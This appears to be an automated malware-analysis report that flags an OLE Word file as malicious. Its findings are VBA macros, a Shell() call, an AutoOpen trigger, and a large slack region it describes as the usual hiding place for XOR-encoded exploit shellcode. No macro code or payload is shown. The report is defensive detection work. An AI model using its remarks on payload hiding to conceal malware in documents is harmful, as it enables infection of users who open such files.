Verdict: MALICIOUS
Risk Score: 182
Heuristics: 6
- VBA macros detected (medium, 2 related findings) [OLE_VBA_MACROS]: Document contains VBA macro code.
- Shell() call in VBA (critical) [OLE_VBA_SHELL]: Shell() call in VBA.
- AutoOpen macro (high) [OLE_VBA_AUTOOPEN]: AutoOpen macro.
- OLE document has large unaccounted-for region (high) [OLE_SLACK_ANOMALY]: OLE file is 109,824 bytes but its declared streams total only 36,244 bytes — 73,580 bytes (67%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
- Legacy WordBasic auto-exec macro marker (medium) [OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info) [EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts: 1

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 17189 bytes |

SHA-256: d4d4ef00fded9b57da5a9072a07140c780f5cadbd94b6a01d67bda571c9bc0e9
Preview script: first 1,000 lines of the extracted script.